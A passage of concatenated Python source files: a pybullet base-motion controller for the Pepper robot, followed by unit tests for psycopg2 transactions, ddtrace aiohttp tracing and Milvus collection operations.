angular_velocity = PepperBaseController.MAX_ANGULAR_VELOCITY
elif angular_velocity < PepperBaseController.MIN_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MIN_ANGULAR_VELOCITY
BaseController._setAngularVelocity(self, angular_velocity)
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
if linear_acceleration > PepperBaseController.MAX_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MAX_LINEAR_ACCELERATION
elif linear_acceleration <\
PepperBaseController.MIN_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MIN_LINEAR_ACCELERATION
BaseController._setLinearAcceleration(self, linear_acceleration)
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
if angular_acceleration >\
PepperBaseController.MAX_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MAX_ANGULAR_ACCELERATION
elif angular_acceleration <\
PepperBaseController.MIN_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MIN_ANGULAR_ACCELERATION
BaseController._setAngularAcceleration(self, angular_acceleration)
def moveTo(self, x, y, theta, frame, _async=False):
"""
Move the robot in frame world or robot (FRAME_WORLD=1, FRAME_ROBOT=2).
This method can be called synchonously or asynchronously. In the
asynchronous mode, the function can be called when it's already
launched, this will update the goal of the motion.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
_async - The method is launched in async mode if True, in synch
mode if False (False by default)
"""
self._setGoal(x, y, theta, frame)
if self.control_process.isAlive():
if _async is False:
raise pybullet.error(
"Already a moveTo asynchronous. Can't "
"launch moveTo synchronous")
self._initProcess()
elif _async:
self.control_process = threading.Thread(target=self._moveToProcess)
self.control_process.start()
else:
self._moveToProcess()
def move(self, x, y, theta):
"""
Apply a speed on the robot's base.
Parameters:
x - Speed on the x axis, in m/s
y - Speed on the y axis, in m/s
theta - Rotational speed around the z axis, in rad/s
"""
# Kill any previous moveTo process running
self.moveTo(0, 0, 0, frame=BaseController.FRAME_ROBOT, _async=True)
# Bound the velocity. The max acceleration is not taken into account
# here, this is a potential improvment
if abs(x) > PepperBaseController.MAX_LINEAR_VELOCITY:
x = PepperBaseController.MAX_LINEAR_VELOCITY * (x/abs(x))
if abs(y) > PepperBaseController.MAX_LINEAR_VELOCITY:
y = PepperBaseController.MAX_LINEAR_VELOCITY * (y/abs(y))
if abs(theta) > PepperBaseController.MAX_ANGULAR_VELOCITY:
theta = PepperBaseController.MAX_ANGULAR_VELOCITY *\
(theta/abs(theta))
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_world_velocity = [
x * math.cos(actual_orn[2]) - y * math.sin(actual_orn[2]),
x * math.sin(actual_orn[2]) + y * math.cos(actual_orn[2]),
0]
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
linear_world_velocity,
[0, 0, theta],
physicsClientId=self.physics_client)
def _updateConstraint(self):
"""
INTERNAL METHOD, update the robot's constraint.
"""
# Change the constraint to the requested position and orientation
pybullet.changeConstraint(
self.motion_constraint,
self.pose_goal["position"],
jointChildFrameOrientation=pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"]),
maxForce=self.force,
physicsClientId=self.physics_client)
def _initProcess(self):
"""
INTERNAL METHOD, initialize the motion process and all variables
needed.
"""
# Get actual position in frame world
self.pose_init["position"], self.pose_init["orientation"] =\
pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert pose_init orientation in orn_euler
self.pose_init["orientation"] = pybullet.getEulerFromQuaternion(
self.pose_init["orientation"]
)
self._updateGoal()
self._updateConstraint()
# Compute the ratio distance requested on the total distance
distance = getDistance(
self.pose_init["position"],
self.pose_goal["position"])
self.p_x = 0
self.p_y = 0
self.p_theta = 0
if distance:
self.p_x = (
self.pose_goal["position"][0] -
self.pose_init["position"][0]) / distance
self.p_y = (
self.pose_goal["position"][1] -
self.pose_init["position"][1]) / distance
theta_to_do = getOrientation(
self.pose_init["orientation"],
self.pose_goal["orientation"])
if abs(theta_to_do):
self.p_theta = abs(theta_to_do) / theta_to_do
def _endProcess(self):
"""
INTERNAL METHOD, stop the robot movement.
"""
# Change the constraint to the actual position and orientation in
# order to stop the robot's motion. The force applied is purposely huge
# to avoid oscillations.
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
pybullet.changeConstraint(
self.motion_constraint,
actual_pos,
jointChildFrameOrientation=actual_orn,
maxForce=self.force * 10,
physicsClientId=self.physics_client)
pybullet.resetBaseVelocity(
self.robot_model,
[0, 0, 0],
[0, 0, 0],
physicsClientId=self.physics_client)
def _moveToProcess(self):
"""
INTERNAL METHOD, process allowing to move the robot's base.
"""
self._initProcess()
# actual_pos = self.pose_init["position"]
# actual_orn = self.pose_init["orientation"]
init_pos = self.pose_init["position"]
init_orn = self.pose_init["orientation"]
actual_pos = init_pos
actual_orn = init_orn
while not self._controller_termination:
translation_distance = getDistance(
actual_pos,
self.pose_goal["position"])
# Modulo the orientation pose goal with conversion in quaternion
modulo_quater_pose_goal = pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"])
# Conversion into euler
modulo_euler_pose_goal = pybullet.getEulerFromQuaternion(
modulo_quater_pose_goal)
rotation_distance = abs(getOrientation(
actual_orn,
modulo_euler_pose_goal))
if translation_distance < self.linear_threshold and\
rotation_distance < self.angular_threshold:
break
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_vel_x = computeVelocity(
self.linear_acceleration,
0.05,
self.linear_velocity,
getDistance(actual_pos, init_pos),
getDistance(actual_pos, self.pose_goal["position"]))
linear_vel_y = linear_vel_x
angular_vel = computeVelocity(
self.angular_acceleration,
0.05,
self.angular_velocity,
abs(getOrientation(
init_orn,
actual_orn)),
abs(getOrientation(
actual_orn,
self.pose_goal["orientation"])))
# If the robot is on the requested position, we set the velocity to
# 0.
if abs(actual_pos[0] - self.pose_goal["position"][0]) <=\
self.linear_threshold / 2:
linear_vel_x = 0
if abs(actual_pos[1] - self.pose_goal["position"][1]) <=\
self.linear_threshold / 2:
linear_vel_y = 0
if abs(getOrientation(
actual_orn, self.pose_goal["orientation"])) <=\
self.angular_threshold:
angular_vel = 0
# Reset the velocity of the robot
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
[linear_vel_x * self.p_x, linear_vel_y * self.p_y, 0],
[0, 0, angular_vel * self.p_theta],
physicsClientId=self.physics_client)
self._endProcess()
|
test_transaction.py
|
#!/usr/bin/env python
# test_transaction - unit test on transaction behaviour
#
# Copyright (C) 2007-2011 Federico Di Gregorio <fog@debian.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import threading
from testutils import unittest, ConnectingTestCase, skip_before_postgres, slow
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY)
class TransactionTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
curs = self.conn.cursor()
curs.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
# The constraint is set to deferrable for the commit_failed test
curs.execute('''
CREATE TEMPORARY TABLE table2 (
id int PRIMARY KEY,
table1_id int,
CONSTRAINT table2__table1_id__fk
FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''')
curs.execute('INSERT INTO table1 VALUES (1)')
curs.execute('INSERT INTO table2 VALUES (1, 1)')
self.conn.commit()
def test_rollback(self):
# Test that rollback undoes changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.rollback()
self.assertEqual(self.conn.status, STATUS_READY)
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [])
def test_commit(self):
# Test that commit stores changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.commit()
self.assertEqual(self.conn.status, STATUS_READY)
# Now rollback and show that the new record is still there:
self.conn.rollback()
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [(2, 1)])
def test_failed_commit(self):
# Test that we can recover from a failed commit.
# We use a deferred constraint to cause a failure on commit.
curs = self.conn.cursor()
curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
curs.execute('INSERT INTO table2 VALUES (2, 42)')
# The commit should fail, and move the cursor back to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.assertRaises(psycopg2.IntegrityError, self.conn.commit)
self.assertEqual(self.conn.status, STATUS_READY)
# The connection should be ready to use for the next transaction:
curs.execute('SELECT 1')
self.assertEqual(curs.fetchone()[0], 1)
class DeadlockSerializationTests(ConnectingTestCase):
"""Test deadlock and serialization failure errors."""
def connect(self):
conn = ConnectingTestCase.connect(self)
conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
return conn
def setUp(self):
ConnectingTestCase.setUp(self)
curs = self.conn.cursor()
# Drop table if it already exists
try:
curs.execute("DROP TABLE table1")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
try:
curs.execute("DROP TABLE table2")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
# Create sample data
curs.execute("""
CREATE TABLE table1 (
id int PRIMARY KEY,
name text)
""")
curs.execute("INSERT INTO table1 VALUES (1, 'hello')")
curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)")
self.conn.commit()
def tearDown(self):
curs = self.conn.cursor()
curs.execute("DROP TABLE table1")
curs.execute("DROP TABLE table2")
self.conn.commit()
ConnectingTestCase.tearDown(self)
@slow
def test_deadlock(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
step1.set()
step2.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
except psycopg2.DatabaseError, exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
step2.set()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
except psycopg2.DatabaseError, exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
@slow
def test_serialisation_failure(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("SELECT name FROM table1 WHERE id = 1")
curs.fetchall()
step1.set()
step2.wait()
curs.execute("UPDATE table1 SET name='task1' WHERE id = 1")
conn.commit()
except psycopg2.DatabaseError, exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("UPDATE table1 SET name='task2' WHERE id = 1")
conn.commit()
except psycopg2.DatabaseError, exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
class QueryCancellationTests(ConnectingTestCase):
"""Tests for query cancellation."""
def setUp(self):
ConnectingTestCase.setUp(self)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
@skip_before_postgres(8, 2)
def test_statement_timeout(self):
curs = self.conn.cursor()
# Set a low statement timeout, then sleep for a longer period.
curs.execute('SET statement_timeout TO 10')
self.assertRaises(psycopg2.extensions.QueryCanceledError,
curs.execute, 'SELECT pg_sleep(50)')
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test_request_safety.py
|
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from nose.tools import eq_
from aiohttp.test_utils import unittest_run_loop
from ddtrace.pin import Pin
from ddtrace.provider import DefaultContextProvider
from ddtrace.contrib.aiohttp.patch import patch, unpatch
from ddtrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
class TestAiohttpSafety(TraceTestCase):
"""
Ensure that if the ``AsyncioTracer`` is not properly configured,
bad traces are produced but the ``Context`` object will not
leak memory.
"""
def setUp(self):
super().setUp()
asyncio.set_event_loop(self.loop)
def enable_tracing(self):
# aiohttp TestCase with the wrong context provider
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
self.tracer.configure(context_provider=DefaultContextProvider())
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
request = yield from self.client.request('GET', '/template/')
eq_(200, request.status)
yield from request.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(2, len(traces[0]))
request_span = traces[0][0]
template_span = traces[0][1]
# request
eq_('aiohttp-web', request_span.service)
eq_('aiohttp.request', request_span.name)
eq_('/template/', request_span.resource)
# template
eq_('aiohttp-web', template_span.service)
eq_('aiohttp.template', template_span.name)
eq_('aiohttp.template', template_span.resource)
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
# it should produce a wrong trace, but the Context must
# be finished
def make_requests():
url = self.client.make_url('/delayed/')
response = request.urlopen(str(url)).read().decode('utf-8')
eq_('Done', response)
# blocking call executed in different threads
ctx = self.tracer.get_call_context()
threads = [threading.Thread(target=make_requests) for _ in range(10)]
for t in threads:
t.daemon = True
t.start()
# we should yield so that this loop can handle
# threads' requests
yield from asyncio.sleep(0.5)
for t in threads:
t.join(timeout=0.5)
# the trace is wrong but the Context is finished
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(10, len(traces[0]))
eq_(0, len(ctx._trace))
|
test_collection.py
|
import pdb
import pytest
import logging
import itertools
from time import sleep
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
drop_collection_interval_time = 3
index_file_size = 10
vectors = gen_vectors(100, dim)
class TestCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
def test_create_collection(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_ip(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_jaccard(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_hamming(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_substructure(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_superstructure(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_collection_without_connection(self, dis_connect):
# '''
# target: test create collection, without connection
# method: create collection with correct params, with a disconnected instance
# expected: create raise exception
# '''
# collection_name = gen_unique_str("test_collection")
# param = {'collection_name': collection_name,
# 'dimension': dim,
# 'index_file_size': index_file_size,
# 'metric_type': MetricType.L2}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_collection(param)
def test_create_collection_existed(self, connect):
'''
target: test create collection but the collection name have already existed
method: create collection with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
@pytest.mark.level(2)
def test_create_collection_existed_ip(self, connect):
'''
target: test create collection but the collection name have already existed
method: create collection with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_None(self, connect):
'''
target: test create collection but the collection name is None
method: create collection, param collection_name is None
expected: create raise error
'''
param = {'collection_name': None,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_dimension(self, connect):
'''
target: test create collection with no dimension params
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_file_size(self, connect):
'''
target: test create collection with no index_file_size params
method: create collection with corrent params
expected: create status return ok, use default 1024
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
logging.getLogger().info(status)
status, result = connect.describe_collection(collection_name)
logging.getLogger().info(result)
assert result.index_file_size == 1024
def test_create_collection_no_metric_type(self, connect):
'''
target: test create collection with no metric_type params
method: create collection with corrent params
expected: create status return ok, use default L2
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
status = connect.create_collection(param)
status, result = connect.describe_collection(collection_name)
logging.getLogger().info(result)
assert result.metric_type == MetricType.L2
"""
******************************************************************
The following cases are used to test `describe_collection` function
******************************************************************
"""
def test_collection_describe_result(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.L2
@pytest.mark.level(2)
def test_collection_describe_collection_name_ip(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.IP
@pytest.mark.level(2)
def test_collection_describe_collection_name_jaccard(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.JACCARD
@pytest.mark.level(2)
def test_collection_describe_collection_name_hamming(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.HAMMING
def test_collection_describe_collection_name_substructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUBSTRUCTURE
def test_collection_describe_collection_name_superstructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUPERSTRUCTURE
# TODO: enable
@pytest.mark.level(2)
def _test_collection_describe_collection_name_multiprocessing(self, connect, args):
'''
target: test describe collection created with multiprocess
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def describecollection(milvus):
status, res = milvus.describe_collection(collection_name)
assert res.collection_name == collection_name
process_num = 4
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=describecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# @pytest.mark.level(2)
# def test_collection_describe_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.describe_collection(collection)
def test_collection_describe_dimension(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the dimention value returned by describe method
expected: dimention equals with dimention when created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim+1,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.describe_collection(collection_name)
assert res.dimension == dim+1
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
def test_drop_collection(self, connect, collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(collection)
assert not assert_has_collection(connect, collection)
@pytest.mark.level(2)
def test_drop_collection_ip(self, connect, ip_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ip_collection)
assert not assert_has_collection(connect, ip_collection)
@pytest.mark.level(2)
def test_drop_collection_jaccard(self, connect, jac_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(jac_collection)
assert not assert_has_collection(connect, jac_collection)
@pytest.mark.level(2)
def test_drop_collection_hamming(self, connect, ham_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ham_collection)
assert not assert_has_collection(connect, ham_collection)
# @pytest.mark.level(2)
# def test_collection_delete_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_collection(collection)
def test_drop_collection_not_existed(self, connect):
'''
target: test delete collection not in index
method: delete all collections, and delete collection again,
assert the value returned by delete method
expected: status not ok
'''
collection_name = gen_unique_str("test_collection")
status = connect.drop_collection(collection_name)
assert not status.OK()
def test_delete_create_collection_repeatedly(self, connect):
'''
target: test delete and create the same collection repeatedly
method: try to create the same collection and delete repeatedly,
assert the value returned by delete method
expected: create ok and delete ok
'''
loops = 2
timeout = 5
for i in range(loops):
collection_name = "test_collection"
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status = None
while i < timeout:
status = connect.drop_collection(collection_name)
time.sleep(1)
i += 1
if status.OK():
break
if i > timeout:
assert False
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing(self, args):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 6
processes = []
def deletecollection(milvus):
status = milvus.drop_collection(collection)
# assert not status.code==0
assert assert_has_collection(milvus, collection)
assert status.OK()
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=deletecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing_multicollection(self, connect):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 5
loop_num = 2
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_drop_collection_with_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
j = j + 1
def delete(connect,ids):
i = 0
while i < loop_num:
status = connect.drop_collection(collection[ids*process_num+i])
time.sleep(2)
assert status.OK()
assert not assert_has_collection(connect, collection[ids*process_num+i])
i = i + 1
for i in range(process_num):
ids = i
p = Process(target=delete, args=(connect,ids))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
def test_has_collection(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_ip(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_jaccard(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_hamming(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
# @pytest.mark.level(2)
# def test_has_collection_without_connection(self, collection, dis_connect):
# '''
# target: test has collection, without connection
# method: calling has collection with correct params, with a disconnected instance
# expected: has collection raise exception
# '''
# with pytest.raises(Exception) as e:
# assert_has_collection(dis_connect, collection)
def test_has_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, which not existed in db,
assert the value returned by has_collection method
expected: False
'''
collection_name = gen_unique_str("test_collection")
assert not assert_has_collection(connect, collection_name)
"""
******************************************************************
The following cases are used to test `show_collections` function
******************************************************************
"""
def test_show_collections(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by show_collections method is equal to 0
